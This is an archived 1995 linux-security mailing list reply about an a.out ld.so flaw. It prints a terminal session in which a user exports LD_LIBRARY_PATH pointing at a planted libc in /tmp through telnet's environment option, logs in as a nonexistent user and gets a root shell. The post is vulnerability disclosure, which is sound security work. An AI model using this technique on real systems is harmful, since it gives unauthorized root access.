[470] in linux-security and linux-alert archive
Re: linux a.out ld.so problem
daemon@ATHENA.MIT.EDU (medulla)
Wed Nov 8 17:05:52 1995
Date: Tue, 7 Nov 1995 00:41:49 -0500 (EST)
From: medulla <medulla@infosoc.com>
To: Adrian <adrian@procyon.com>
cc: linux-security@tarsier.cv.nrao.edu
In-Reply-To: <199511070030.SAA25662@procyon.com>
On Mon, 6 Nov 1995, Adrian wrote:
>
> I'm not sure why elf might be different, but I see a problem with
> your demonstration. I'm assuming that the "#" in your prompt means
> that you are root. The key thing is not that the s-uid bit is set
> on the target binary, when you attempt to alter the LD_LIBRARY_PATH.
> Rather it is the difference between the ruid and the euid when the
> target binary loads. When a normal user executes a set-uid binary
> owned by root, that normal users uid will remain the real-uid while
> then effective-uid will be changed to root, so the two won't match,
> and the LD_LIBRARY_PATH environment variable will be ignored. If
> you are root when you execute the target binary, the set-uid bit
> on a root owned set-uid binary will have no real effect. The
> ruid and euid will still be equal, so the LD_LIBRARY_PATH variable
> will have its effect.
You're right, my demonstration is quite flawed :( here is a somewhat
better one I just did...
hfpa:~> ls -l /bin/login
-rwxr-sr-x 1 root daemon 6752 Nov 7 00:46 /bin/login
hfpa:~> ls -l /tmp/libc.so.4
-rw-rw-r-- 1 medulla users 716612 Nov 7 00:51 /tmp/libc.so.4
hfpa:~> id
uid=504(medulla) gid=100(users) groups=100(users),0(root),18(web)
hfpa:~> telnet
telnet> env def LD_LIBRARY_PATH /tmp
telnet> env exp LD_LIBRARY_PATH
telnet> o localhost
Trying 127.0.0.1...
Connected to localhost.
Escape character is '^]'.
Welcome to hfpa medulla@localhost!
Linux 1.2.13 (hfpa.thepoint.net) (ttyp1)
hfpa login: nosuchuser
Password:
bash# id
uid=0(root) gid=0(root) egid=2(daemon)
>
> ---
> L. Adrian Griffis
> adrian@procyon.com
>
>
